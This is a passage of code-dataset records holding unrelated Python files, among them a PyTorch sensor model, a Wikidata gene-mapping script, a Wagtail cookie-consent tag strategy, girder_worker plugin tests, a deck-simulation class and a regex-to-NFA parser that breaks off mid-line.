(n_feature))\n        # print(' | Padding: %d' % (padding_size))\n        # print(' | RNN layer: %d' % (args.layer))\n        self.n_class = n_class\n\n        self.acce_shoe_net = SingleSensorTransformer(args, n_feature=3)\n        self.acce_watch_net = SingleSensorTransformer(args, n_feature=3)\n        self.gyro_net = SingleSensorTransformer(args, n_feature=3)\n\n        self.sensor_net = MultipSensorTransformer(args)\n\n        self.rnn = nn.GRU(self.hidden_size, self.hidden_size, num_layers=2,\n                          dropout=dropout, batch_first=True, bidirectional=False)\n\n        self.dense = nn.Linear(self.hidden_size, self.n_class)\n\n    def forward(self, x, hidden=None):\n        \"\"\"\n\n        :param x: batch_size x (tpoint_per_step * recurrent_step) x n_feature\n        :param hidden:\n        :return:\n        \"\"\"\n        print('-')\n\n        print(x.shape)\n        # Split into three parts\n        # (batch, length, feature_dim) -> (batch, channel=1, length, feature_dim)\n        x = torch.unsqueeze(x, 1)\n        x_acc_shoe, x_acc_watch, x_gyro = torch.split(x, 3, dim=3)\n        # x_acc_shoe = Variable(torch.transpose(x_acc_shoe, 1, 2))\n        # x_acc_watch = Variable(torch.transpose(x_acc_watch, 1, 2))\n        # x_gyro = Variable(torch.transpose(x_gyro, 1, 2))\n\n        x_acc_shoe = Variable(x_acc_shoe)\n        x_acc_watch = Variable(x_acc_watch)\n        x_gyro = Variable(x_gyro)\n\n        print(x_acc_shoe.shape)\n        print(x_acc_watch.shape)\n        print(x_gyro.shape)\n\n        x_acc_shoe = self.acce_shoe_net(x_acc_shoe)\n        x_acc_watch = self.acce_watch_net(x_acc_watch)\n        x_gyro = self.gyro_net(x_gyro)\n\n        print('-')\n        print(x_gyro.shape)\n\n        x = torch.cat([x_acc_shoe, x_acc_watch, x_gyro], dim=1)  # concatenate along the channel dimension expected by sensor_net\n        x = self.sensor_net(x)\n\n        x, hidden = self.rnn(x)\n\n        x = self.dense(x)\n\n        return x\n","sub_path":"src/model/deepsense.py","file_name":"deepsense.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"646329036","text":"\"\"\"Output TSV of English Wikipedia article names to gene symbols\n\nFor example, the page https://en.wikipedia.org/wiki/Tumor_necrosis_factor maps\nto the gene symbol \"TNF\". This is output as:\n\nTumor_necrosis_factor\tTNF\n\nin `gene_page_map.tsv`. This script uses the Wikidata Query Service\n(https://query.wikidata.org/) to make a SPARQL query linking articles to\ngene symbols. The output TSV is used by `views.py`.\n\"\"\"\n\nfrom SPARQLWrapper import SPARQLWrapper, JSON\nfrom pandas import json_normalize\n\noutput_path = \"./data/gene_page_map.tsv\"\n\ndef query_wikidata(sparql_query, sparql_service_url):\n    \"\"\"Query endpoint with given query string and return the results as a\n    pandas Dataframe.\n    \"\"\"\n    sparql = SPARQLWrapper(sparql_service_url, agent=\"chrome\")\n\n    sparql.setQuery(sparql_query)\n    sparql.setReturnFormat(JSON)\n\n    result = sparql.query().convert()\n    return json_normalize(result[\"results\"][\"bindings\"])\n\ndef query_human_genes_special():\n    \"\"\"Execute SPARQL query for article names for special human genes\n\n    Some articles about genes are modeled as proteins on Wikidata.\n    These tend to be prominent genes, like BRCA1 and TP53.\n    \"\"\"\n    print(\"Querying human genes, special case...\")\n    endpoint_url = \"https://query.wikidata.org/sparql\"\n    query = \"\"\"\n    SELECT DISTINCT ?item ?gene_symbol ?titleLabel WHERE {\n      ?protein schema:about ?item;\n        schema:isPartOf <https://en.wikipedia.org/>;\n        schema:name ?title.\n      BIND(REPLACE(STR(?title), \"\\\\\\\\ \", \"_\") AS ?titleLabel)\n      ?item wdt:P31 wd:Q8054. # is a protein\n      ?item wdt:P703 wd:Q15978631. 
# found in human\n      ?item wdt:P702 ?gene.\n      ?gene wdt:P353 ?gene_symbol.\n    }\n    \"\"\"\n    return query_wikidata(query, endpoint_url)\n\ndef query_human_genes_general():\n    \"\"\"Execute SPARQL query for article names for general human genes\n\n    Almost all articles about genes are modeled as genes on Wikidata.\n    This handles the common case.\n    \"\"\"\n    print(\"Querying human genes, general case...\")\n    endpoint_url = \"https://query.wikidata.org/sparql\"\n    query = \"\"\"\n    SELECT DISTINCT ?item ?ncbi_gene ?itemLabel ?titleLabel WHERE {\n      ?gene schema:about ?item;\n        schema:isPartOf <https://en.wikipedia.org/>;\n        schema:name ?title.\n      BIND(REPLACE(STR(?title), \"\\\\\\\\ \", \"_\") AS ?titleLabel)\n      ?item wdt:P351 ?ncbi_gene;\n        wdt:P703 wd:Q15978631. # found in human\n      SERVICE wikibase:label\n        { bd:serviceParam wikibase:language \"[AUTO_LANGUAGE],en\". }\n    }\"\"\"\n\n    return query_wikidata(query, endpoint_url)\n\ndef save_human_genes(data_special, data_general, output_path):\n    \"\"\"Save results of the gene query locally\n    \"\"\"\n    print(\"Saving results of gene query locally...\")\n    data_special[[\"titleLabel.value\", \"gene_symbol.value\"]].rename(\n        columns=lambda col: col.replace(\"Label.value\", \"\")\n    ).to_csv(output_path, sep=\"\\t\", index=False)\n    data_general[[\"titleLabel.value\", \"itemLabel.value\"]].rename(\n        columns=lambda col: col.replace(\"Label.value\", \"\")\n    ).to_csv(output_path, sep=\"\\t\", index=False, mode=\"a\", header=False)\n    print(\"Results saved to: \" + output_path)\n\n\ngenes_special = query_human_genes_special()\ngenes_general = query_human_genes_general()\nsave_human_genes(genes_special, genes_general, output_path)\n","sub_path":"gene_hints/views/generate_gene_page_map.py","file_name":"generate_gene_page_map.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"643837073","text":"from django.db.models import Q\n\nfrom wagtail_tag_manager.models import Tag, Trigger, TagTypeSettings\n\n\nclass TagStrategy(object):\n    def __init__(self, request, consent=None):\n        self._request = request\n        self._consent = consent\n        self._context = Tag.create_context(request)\n\n        self._cookies = request.COOKIES\n        self._config = TagTypeSettings.all()\n        self._tags = []\n\n        self.cookies = {}\n\n        self.define_strategy()\n\n    # https://gist.github.com/jberghoef/9ffa2b738cbb0aab624ff091dc6fe9a7\n    def define_strategy(self):\n        for tag_type, tag_config in self._config.items():\n            handler = getattr(self, self._request.method.lower(), None)\n            if handler:\n                handler(tag_type, tag_config)\n\n    def get(self, tag_type, tag_config):\n        cookie_name = Tag.get_cookie_name(tag_type)\n        cookie = self._cookies.get(cookie_name, None)\n\n        if tag_config == \"required\":\n            # Include required instant tags\n            # Include required cookie\n            self._tags.append((Tag.INSTANT_LOAD, tag_type))\n            self.cookies[cookie_name] = \"true\"\n        elif tag_config == \"initial\":\n            if not cookie or cookie == \"unset\":\n                # Include initial cookie\n                self.cookies[cookie_name] = \"unset\"\n            elif cookie == \"true\":\n                # Include initial instant tags\n                self._tags.append((Tag.INSTANT_LOAD, tag_type))\n                self.cookies[cookie_name] = \"true\"\n        else:\n            if cookie == \"true\":\n                # Include generic instant tags\n                self._tags.append((Tag.INSTANT_LOAD, tag_type))\n                self.cookies[cookie_name] = \"true\"\n\n    def post(self, tag_type, tag_config):\n        cookie_name = Tag.get_cookie_name(tag_type)\n        cookie = self._cookies.get(cookie_name, None)\n\n        if tag_config == \"required\":\n            # Include required lazy 
tags\n # Include required cookie\n if self._consent is None:\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n if cookie != \"true\":\n self.cookies[cookie_name] = \"true\"\n\n elif self._consent is None:\n if tag_config == \"initial\":\n if cookie == \"unset\":\n # Include initial lazy tags\n # Include initial instant tags\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n self._tags.append((Tag.INSTANT_LOAD, tag_type))\n elif cookie == \"true\":\n # Include initial lazy tags\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n else:\n if cookie == \"true\":\n # Include generic lazy tags\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n\n elif self._consent is True:\n if tag_config == \"initial\":\n if cookie == \"false\":\n # Include initial lazy tags\n # Include initial instant tags\n # Include initial cookie\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n self._tags.append((Tag.INSTANT_LOAD, tag_type))\n self.cookies[cookie_name] = \"true\"\n else:\n if cookie == \"true\":\n pass\n else:\n # Include generic lazy tags\n # Include generic instant tags\n # Include generic cookie\n self._tags.append((Tag.LAZY_LOAD, tag_type))\n self._tags.append((Tag.INSTANT_LOAD, tag_type))\n self.cookies[cookie_name] = \"true\"\n\n elif self._consent is False:\n self.cookies[cookie_name] = \"false\"\n\n def should_include(self, tag_type, tag_config):\n cookie_name = Tag.get_cookie_name(tag_type)\n cookie = self._cookies.get(cookie_name, None)\n\n if tag_config == \"required\":\n return True\n elif tag_config == \"initial\":\n if not cookie or cookie == \"unset\" or cookie == \"true\":\n return True\n else:\n if cookie == \"true\":\n return True\n\n @property\n def queryset(self):\n queryset = Q()\n for tag_type in self._tags:\n queryset.add(Q(tag_loading=tag_type[0]) & Q(tag_type=tag_type[1]), Q.OR)\n return queryset\n\n @property\n def tags(self):\n if self._tags:\n return Tag.objects.active().filter(self.queryset)\n else:\n return Tag.objects.none()\n\n @property\n def result(self):\n result = [\n {\"object\": tag, \"element\": tag.get_doc(self._request, self._context)}\n for tag in self.tags\n ]\n\n for trigger in Trigger.objects.active():\n match = trigger.match(self._request)\n if match is not None:\n for tag in trigger.tags.filter(self.queryset):\n result.append(\n {\n \"object\": tag,\n \"element\": tag.get_doc(\n self._request, {**self._context, **match.groupdict()}\n ),\n }\n )\n\n return result\n\n @property\n def cookie_state(self):\n return {\n tag_type: self.cookies.get(Tag.get_cookie_name(tag_type), \"false\")\n != \"false\"\n for tag_type in Tag.get_types()\n }\n","sub_path":"src/wagtail_tag_manager/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"510929672","text":"import sys\nimport random\nfrom PyQt5 import QtWidgets, QtGui, QtCore\n\nclass MyApp(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n\n self.ed_1 = QtWidgets.QTextEdit()\n self.ed_2 = QtWidgets.QLineEdit()\n\n self.lbl_1 = QtWidgets.QLabel(\"count:\")\n\n self.btn_next = QtWidgets.QPushButton(\"Next\")\n self.btn_back = QtWidgets.QPushButton(\"Back\")\n\n self.h_box = QtWidgets.QHBoxLayout()\n self.v_box = QtWidgets.QVBoxLayout()\n\n self.set_up()\n self.show()\n\n def set_up(self):\n self.setFont(QtGui.QFont(\"Arial\", 12))\n self.setWindowTitle(\"Hello Word!\")\n self.setGeometry(100, 100, 600, 400)\n icons = {\n 0: QtGui.QIcon(\"icon\\\\chameleon.ico\"),\n 1: 
QtGui.QIcon(\"icon\\\\aol_mail.ico\"),\n 2: QtGui.QIcon(\"icon\\\\emotion_darth_wader.ico\")\n }\n\n self.setWindowIcon(icons.get((random.randint(0, 9) % 3)))\n\n text = \"\"\"In this text I want to highlight this zzwordyy and only this word.\\n\"\"\" + \\\n \"\"\"Any other word shouldn't be highlighted\"\"\"\n self.ed_1.setText(text)\n\n self.ed_2.setValidator(QtGui.QIntValidator())\n\n self.h_box.addWidget(self.lbl_1)\n self.h_box.addWidget(self.ed_2)\n\n self.btn_next.clicked.connect(self.btn_next_click)\n self.btn_back.clicked.connect(self.btn_back_click)\n self.h_box.addWidget(self.btn_next)\n self.h_box.addWidget(self.btn_back)\n\n self.v_box.addWidget(self.ed_1)\n self.v_box.addLayout(self.h_box)\n\n self.setLayout(self.v_box)\n\n def btn_next_click(self):\n try:\n cursor = self.ed_1.textCursor()\n print(cursor.position())\n self.ed_1.setFocus()\n if self.ed_2.text():\n # cursor.setPosition(int(self.ed_2.text()))\n cursor.movePosition(QtGui.QTextCursor.Right, QtGui.QTextCursor.MoveAnchor, int(self.ed_2.text()))\n print(cursor.block().text())\n print(cursor.position())\n self.ed_1.setTextCursor(cursor)\n except Exception as e:\n print(e)\n\n def btn_back_click(self):\n cursor = self.ed_1.textCursor()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = MyApp()\n sys.exit(app.exec_())","sub_path":"PyQtPractice/TextCursor.py","file_name":"TextCursor.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"20617926","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nWrite a program which contains one function named as Add() which accepts two numbers\r\nfrom user and return addition of that two numbers.\r\nInput : 11 5 Output : 16\r\n4.Write a program which display 5 times Marvellous\r\n\"\"\"\r\n\r\ndef add(x,y):\r\n z=x+y\r\n return z\r\n \r\ndef main():\r\n no1=int(input(\"enter the number\"))\r\n no2=int(input(\"enter the number\"))\r\n p=add(no1,no2)\r\n print(\"addition of{} and {} is {}\".format(no1,no2,p))\r\n\r\nif __name__==\"__main__\":\r\n main() ","sub_path":"1 .assignments/3 addition.py","file_name":"3 addition.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"174643671","text":"import functools\nimport mock\nfrom StringIO import StringIO\nimport unittest\n\nfrom girder_worker_utils import decorators\nfrom girder_worker_utils import types\nfrom girder_worker import entrypoint\nfrom girder_worker.__main__ import main\nfrom girder_worker.app import app\n\n\nclass set_namespace(object):\n def __init__(self, namespace):\n self.namespace = namespace\n\n def __call__(self, func):\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n original = entrypoint.NAMESPACE\n entrypoint.NAMESPACE = self.namespace\n try:\n result = func(*args, **kwargs)\n finally:\n entrypoint.NAMESPACE = original\n return result\n return wrapped\n\n\nclass TestTaskPlugin(unittest.TestCase):\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n def test_get_extension_manager(self):\n mgr = entrypoint.get_extension_manager()\n names = sorted(mgr.names())\n self.assertEqual(names, ['core', 'plugin1', 'plugin2'])\n\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n def test_get_core_task_modules(self):\n modules = entrypoint.get_core_task_modules()\n self.assertEqual(modules, ['os.path'])\n\n @set_namespace('girder_worker._test_plugins.valid_plugins')\n 
@mock.patch('girder_worker.entrypoint.import_module')\n    def test_import_all_includes(self, imp):\n        entrypoint.import_all_includes()\n        imp.assert_has_calls(\n            (mock.call('os.path'), mock.call('girder_worker._test_plugins.tasks')),\n            any_order=True\n        )\n\n    @set_namespace('girder_worker._test_plugins.invalid_plugins')\n    @mock.patch('sys.stderr', new_callable=StringIO)\n    @mock.patch('sys.stdout', new_callable=StringIO)\n    def test_invalid_plugins(self, stdout, stderr):\n        entrypoint.get_plugin_task_modules()\n        lines = stdout.getvalue().splitlines()\n        self.assertEqual(len(lines), 4)\n        for line in lines:\n            self.assertRegexpMatches(\n                line, '^Problem.*(exception[12]|invalid|import), skipping$'\n            )\n\n        self.assertEqual(entrypoint.get_core_task_modules(), ['os.path'])\n\n    @mock.patch('girder_worker.__main__.app')\n    def test_core_plugin(self, app):\n        main()\n        app.conf.update.assert_any_call({'CELERY_IMPORTS':\n                                         ['girder_worker.tasks']})\n\n    @set_namespace('girder_worker._test_plugins.valid_plugins')\n    @mock.patch('girder_worker.__main__.app')\n    def test_external_plugins(self, app):\n        main()\n        app.conf.update.assert_any_call({'CELERY_IMPORTS':\n                                         ['os.path']})\n        app.conf.update.assert_any_call({'CELERY_INCLUDE':\n                                         ['girder_worker._test_plugins.tasks']})\n\n    @set_namespace('girder_worker._test_plugins.valid_plugins')\n    @mock.patch('girder_worker.__main__.app')\n    def test_get_extensions(self, app):\n        main()\n        extensions = sorted(entrypoint.get_extensions())\n        self.assertEqual(extensions, ['core', 'plugin1', 'plugin2'])\n\n    @set_namespace('girder_worker._test_plugins.valid_plugins')\n    @mock.patch('girder_worker.__main__.app')\n    def test_get_module_tasks(self, app):\n        main()\n        extensions = sorted(entrypoint.get_module_tasks('girder_worker._test_plugins.tasks'))\n        self.assertEqual(extensions, [\n            'girder_worker._test_plugins.tasks.celery_task',\n            'girder_worker._test_plugins.tasks.function_task'\n        ])\n\n    @set_namespace('girder_worker._test_plugins.valid_plugins')\n    @mock.patch('girder_worker.__main__.app')\n    def test_get_extension_tasks(self, app):\n        main()\n        extensions = sorted(entrypoint.get_extension_tasks('plugin2'))\n        self.assertEqual(extensions, [\n            'girder_worker._test_plugins.tasks.celery_task',\n            'girder_worker._test_plugins.tasks.function_task'\n        ])\n\n    @set_namespace('girder_worker._test_plugins.valid_plugins')\n    @mock.patch('girder_worker.__main__.app')\n    def test_get_extension_tasks_celery(self, app):\n        main()\n        extensions = sorted(entrypoint.get_extension_tasks('plugin2', celery_only=True))\n        self.assertEqual(extensions, [\n            'girder_worker._test_plugins.tasks.celery_task'\n        ])\n\n    def test_register_extension(self):\n\n        @decorators.argument('n', types.Integer)\n        def echo(n):\n            return n\n\n        @app.task\n        @decorators.argument('n', types.Integer)\n        def echo_celery(n):\n            return n\n\n        tasks = {\n            '%s.echo' % __name__: echo,\n            '%s.echo_celery' % __name__: echo_celery\n        }\n        entrypoint.register_extension('echo_tasks', tasks)\n\n        exts = entrypoint.get_extensions()\n        self.assertIn('echo_tasks', exts)\n        self.assertEqual(entrypoint.get_extension_tasks('echo_tasks'), tasks)\n\n        celery_tasks = entrypoint.get_extension_tasks('echo_tasks', celery_only=True)\n        self.assertEqual(celery_tasks.keys(), ['%s.echo_celery' % __name__])\n","sub_path":"tests/task_plugin_test.py","file_name":"task_plugin_test.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"20617926","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nWrite a program which contains one function named add() which accepts two numbers\r\nfrom the user and returns their sum.\r\nInput : 11 5 Output : 16\r\n\"\"\"\r\n\r\ndef add(x,y):\r\n    z=x+y\r\n    return z\r\n    \r\ndef main():\r\n    no1=int(input(\"enter the number\"))\r\n    no2=int(input(\"enter the number\"))\r\n    p=add(no1,no2)\r\n    print(\"addition of {} and {} is {}\".format(no1,no2,p))\r\n\r\nif __name__==\"__main__\":\r\n    main() ","sub_path":"1 .assignments/3 addition.py","file_name":"3 addition.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"481494270","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on 
Tue Nov 10 13:11:31 2020\r\n\r\n@author: r2d2go\r\n\r\n\"\"\"\r\nimport math\r\nimport numpy as np\r\n\r\nimport random\r\n\r\n\r\nclass Rat(object):\r\n    def __init__(self, decks, changerate, players, dim, initialDist):\r\n        \"\"\"\r\n        Initialize the chain instance.\r\n        \r\n        We have (players) number of players, each with one of (decks) decks. \r\n        We then consider the expected outcome when (dim) of them interact.\r\n        \r\n        Initialize: randomly assign each player a deck according to initialDist.\r\n        \r\n        Parameters\r\n        ----------\r\n        \r\n        decks: int\r\n            number of decks\r\n        \r\n        changerate: dictionary\r\n            Dictionary of change rates, indexed by coordinates on the tensor, separated by dashes (e.g. \"0-3\" in a 4x4 matrix is the upper right corner).\r\n            The last index indicates what the resulting change rate adds to.\r\n        \r\n        players: int\r\n            Number of players\r\n        \r\n        dim: int \r\n            dimension of tensor\r\n        \r\n        initialDist: list\r\n            List of probabilities of being in a given deck.\r\n        \r\n        playerCount: list\r\n            List of the number of players with a given deck (indexed as decks)\r\n        \r\n        \"\"\"\r\n        self.decks = decks\r\n        self.changerate = changerate\r\n        self.players = players\r\n        self.initialDist = initialDist.copy()\r\n        self.playerCount = []\r\n        self.bumps = 0\r\n        self.dim = dim\r\n        for deckI in range(decks):\r\n            self.playerCount.append(0)\r\n        for playerI in range(players):\r\n            deckRand = random.uniform(0,1)\r\n            deckI = 0\r\n            distI = 0\r\n            while distI < decks:\r\n                deckI += initialDist[distI]\r\n                if deckRand < deckI:\r\n                    self.playerCount[distI] += 1\r\n                    distI = decks+1  # sentinel value to exit the loop\r\n                distI += 1\r\n        \r\n    def advance(self, playerrat):\r\n        \"\"\"\r\n        playerrat: float\r\n            proportion of players being advanced\r\n        \"\"\"\r\n        self.playerrat = playerrat\r\n        gamecount = math.floor(self.playerrat*self.players)\r\n        tempCount = self.playerCount.copy()\r\n        \r\n        for gameI in range(gamecount):\r\n            listOfDecks = []\r\n            for i in range(self.dim):\r\n                listOfDecks.append(0)\r\n            for i in range(self.dim):\r\n                deck = 0\r\n                rand = random.randint(1,self.players) \r\n                while deck < self.decks:\r\n                    rand -= self.playerCount[deck]\r\n                    if rand <= 0:\r\n                        listOfDecks[i] = deck\r\n                        deck = 1000000000000  # sentinel larger than any deck count, exits the loop\r\n                    deck += 1\r\n            deckKey = \"\"\r\n            for i in listOfDecks:\r\n                deckKey += str(i)+\"-\"\r\n            deckAdd = 0\r\n            rollI = 0\r\n            gameRoll = random.uniform(0,1)\r\n            for i in listOfDecks:\r\n                rollI += self.changerate[deckKey+str(i)]\r\n                if gameRoll < rollI:\r\n                    tempCount[i] -= 1\r\n                    tempCount[deckAdd] += 1\r\n                deckAdd += 1\r\n        \r\n        self.playerCount = tempCount\r\n        \r\n    def generate_states(self, runLength, playerrat):\r\n        \"\"\"\r\n        Generates states for a run of length runLength.\r\n        \r\n        Parameters\r\n        ----------\r\n        \r\n        runLength: int\r\n            The number of future states to generate.\r\n        \"\"\"\r\n        self.runLength = runLength\r\n        self.playerrat = playerrat\r\n        runList = []\r\n        for i in range(runLength):\r\n            runList.append(self.playerCount.copy())\r\n            self.advance(playerrat)\r\n        return runList\r\n        \r\n    def average(self, initialDist, runLength, runs, playerrat):\r\n        \"\"\"\r\n        Generates a number of runs and finds the average ratio of players over time.\r\n        \r\n        Parameters\r\n        ----------\r\n        \r\n        runs: int\r\n            The number of runs to generate.\r\n        \r\n        \"\"\"\r\n        self.runs = runs\r\n        self.runLength = runLength\r\n        self.playerrat = playerrat\r\n        \r\n        longAverage = []\r\n        blankState = []\r\n        for deck in range(self.decks):\r\n            blankState.append(0)\r\n        for run in range(runLength):\r\n            longAverage.append(blankState.copy())\r\n        for run 
in range(runs):\r\n self.playerCount = []\r\n for deckI in range(self.decks):\r\n self.playerCount.append(0)\r\n for playerI in range(self.players):\r\n deckRand = random.uniform(0,1)\r\n deckI = 0\r\n distI = 0\r\n while distI < self.decks:\r\n deckI += initialDist[distI]\r\n if deckRand < deckI:\r\n self.playerCount[distI] += 1\r\n distI = self.decks+1\r\n distI += 1\r\n runList = self.generate_states(runLength, playerrat)\r\n for state in range(runLength):\r\n for deckRat in range(self.decks):\r\n longAverage[state][deckRat] += runList[state][deckRat]\r\n for deck in range(self.decks):\r\n for state in range(runLength):\r\n longAverage[state][deck] = longAverage[state][deck]/runs/self.players\r\n return(longAverage)\r\n ","sub_path":"generalizedNDimRun.py","file_name":"generalizedNDimRun.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"439228668","text":"from collections import Callable, Iterable, OrderedDict, Mapping\nfrom functools import reduce\n\nimport numpy as np\nfrom multidict import MultiDict\n\n__all__ = ['Bunch', 'EnrichedTuple', 'ReducerMap', 'DefaultOrderedDict']\n\n\nclass Bunch(object):\n \"\"\"\n Bind together an arbitrary number of generic items. This is a mutable\n alternative to a ``namedtuple``.\n\n From: ::\n\n http://code.activestate.com/recipes/52308-the-simple-but-handy-collector-of\\\n -a-bunch-of-named/?in=user-97991\n \"\"\"\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n\n\nclass EnrichedTuple(tuple):\n \"\"\"\n A tuple with an arbitrary number of additional attributes.\n \"\"\"\n def __new__(cls, *items, getters=None, **kwargs):\n obj = super(EnrichedTuple, cls).__new__(cls, items)\n obj.__dict__.update(kwargs)\n obj._getters = dict(zip(getters or [], items))\n return obj\n\n def __getitem__(self, key):\n if isinstance(key, int):\n return super(EnrichedTuple, self).__getitem__(key)\n else:\n return self._getters[key]\n\n\nclass ReducerMap(MultiDict):\n \"\"\"\n Specialised :class:`MultiDict` object that maps a single key to a\n list of potential values and provides a reduction method for\n retrieval.\n \"\"\"\n\n def update(self, values):\n \"\"\"\n Update internal mapping with standard dictionary semantics.\n \"\"\"\n if isinstance(values, Mapping):\n self.extend(values)\n elif isinstance(values, Iterable) and not isinstance(values, str):\n for v in values:\n self.extend(v)\n else:\n self.extend(values)\n\n def unique(self, key):\n \"\"\"\n Returns a unique value for a given key, if such a value\n exists, and raises a ``ValueError`` if it does not.\n\n :param key: Key for which to retrieve a unique value\n \"\"\"\n candidates = self.getall(key)\n\n def compare_to_first(v):\n first = candidates[0]\n if isinstance(first, np.ndarray) or isinstance(v, np.ndarray):\n return (first == v).all()\n else:\n return first == v\n\n if len(candidates) == 1:\n return candidates[0]\n elif all(map(compare_to_first, candidates)):\n return candidates[0]\n else:\n raise ValueError(\"Unable to find unique value for key %s, candidates: %s\"\n % (key, candidates))\n\n def reduce(self, key, op=None):\n \"\"\"\n Returns a reduction of all candidate values for a given key.\n\n :param key: Key for which to retrieve candidate values\n :param op: Operator for reduction among candidate values.\n If not provided, a unique value will be returned,\n or a ``ValueError`` raised if no unique value exists.\n \"\"\"\n if op is None:\n # Return a unique value if it exists\n 
return self.unique(key)\n else:\n return reduce(op, self.getall(key))\n\n def reduce_all(self):\n \"\"\"\n Returns a dictionary with reduced/unique values for all keys.\n \"\"\"\n return {k: self.reduce(key=k) for k in self}\n\n\nclass DefaultOrderedDict(OrderedDict):\n # Source: http://stackoverflow.com/a/6190500/562769\n def __init__(self, default_factory=None, *a, **kw):\n if (default_factory is not None and\n not isinstance(default_factory, Callable)):\n raise TypeError('first argument must be callable')\n OrderedDict.__init__(self, *a, **kw)\n self.default_factory = default_factory\n\n def __getitem__(self, key):\n try:\n return OrderedDict.__getitem__(self, key)\n except KeyError:\n return self.__missing__(key)\n\n def __missing__(self, key):\n if self.default_factory is None:\n raise KeyError(key)\n self[key] = value = self.default_factory()\n return value\n\n def __reduce__(self):\n if self.default_factory is None:\n args = tuple()\n else:\n args = self.default_factory,\n return type(self), args, None, None, self.items()\n\n def copy(self):\n return self.__copy__()\n\n def __copy__(self):\n return type(self)(self.default_factory, self)\n","sub_path":"devito/tools/data_structures.py","file_name":"data_structures.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"107154309","text":"class Token:\n def __init__(self, nom, valeur):\n self.nom = nom\n self.valeur = valeur\n\n def __str__(self):\n return self.nom + \":\" + self.valeur\n\nclass Lexer:\n def __init__(self, pattern):\n self.origine = pattern\n self.symboles = {'(':'PAREN_GAUCHE', ')':'PAREN_DROITE', '*':'ETOILE', '\\x08':'CONCAT', '+':'PLUS', '?':'INTERROGATION'}\n self.actuel = 0\n self.taille = len(self.origine)\n \n def prendre_token(self): \n if self.actuel < self.taille:\n c = self.origine[self.actuel]\n self.actuel += 1\n if c not in self.symboles.keys(): # CHAR\n token = Token('CHAR', c)\n else:\n token = Token(self.symboles[c], c)\n return token\n else:\n return Token('AUCUN', '')\n\nclass Parseur:\n def __init__(self, lexer):\n self.lexer = lexer\n self.tokens = []\n self.lookahead = self.lexer.prendre_token()\n \n def considerer(self, nom):\n if self.lookahead.nom == nom:\n self.lookahead = self.lexer.prendre_token()\n\n def parse(self):\n self.term()\n return self.tokens\n \n def term(self):\n self.operateur()\n if self.lookahead.valeur not in ')':\n self.term()\n self.tokens.append(Token('CONCAT', '\\x08'))\n \n def operateur(self):\n self.primary()\n if self.lookahead.nom in ['ETOILE', 'PLUS', 'INTERROGATION']:\n self.tokens.append(self.lookahead)\n self.considerer(self.lookahead.nom)\n\n def primary(self):\n if self.lookahead.nom == 'PAREN_GAUCHE':\n self.considerer('PAREN_GAUCHE')\n self.term()\n self.considerer('PAREN_DROITE')\n elif self.lookahead.nom == 'CHAR':\n self.tokens.append(self.lookahead)\n self.considerer('CHAR')\n\nclass Etat:\n def __init__(self, nom):\n self.epsilon = []\n self.transitions = {}\n self.nom = nom\n self.est_fin = False\n \nclass NFA:\n def __init__(self, debut, fin):\n self.debut = debut\n self.fin = fin\n fin.est_fin = True\n \n def ajouteretat(self, etat, ensemble_etat):\n if etat in ensemble_etat:\n return\n ensemble_etat.add(etat)\n for eps in etat.epsilon:\n self.ajouteretat(eps, ensemble_etat)\n \n def match(self,s):\n etats_actuels = set()\n self.ajouteretat(self.debut, etats_actuels)\n \n for c in s:\n prochains_etats = set()\n for etat in etats_actuels:\n if c in 
etat.transitions.keys():\n etat_transitoire = etat.transitions[c]\n self.ajouteretat(etat_transitoire, prochains_etats)\n \n etats_actuels = prochains_etats\n\n for s in etats_actuels:\n if s.est_fin:\n return True\n return False\n\nclass Manipulateur:\n def __init__(self):\n self.manipulateurs = {'CHAR':self.gerer_char, 'CONCAT':self.gerer_concat,\n 'ETOILE':self.gerer_rep,\n 'PLUS':self.gerer_rep, 'INTERROGATION':self.gerer_interrogation}\n self.etat_count = 0\n\n def creer_etat(self):\n self.etat_count += 1\n return Etat('s' + str(self.etat_count))\n \n def gerer_char(self, t, pile_nfa):\n s0 = self.creer_etat()\n s1 = self.creer_etat()\n s0.transitions[t.valeur] = s1\n nfa = NFA(s0, s1)\n pile_nfa.append(nfa)\n \n def gerer_concat(self, t, pile_nfa):\n n2 = pile_nfa.pop()\n n1 = pile_nfa.pop()\n n1.fin.est_fin = False\n n1.fin.epsilon.append(n2.debut)\n nfa = NFA(n1.debut, n2.fin)\n pile_nfa.append(nfa)\n \n def gerer_rep(self, t, pile_nfa):\n n1 = pile_nfa.pop()\n s0 = self.creer_etat()\n s1 = self.creer_etat()\n s0.epsilon = 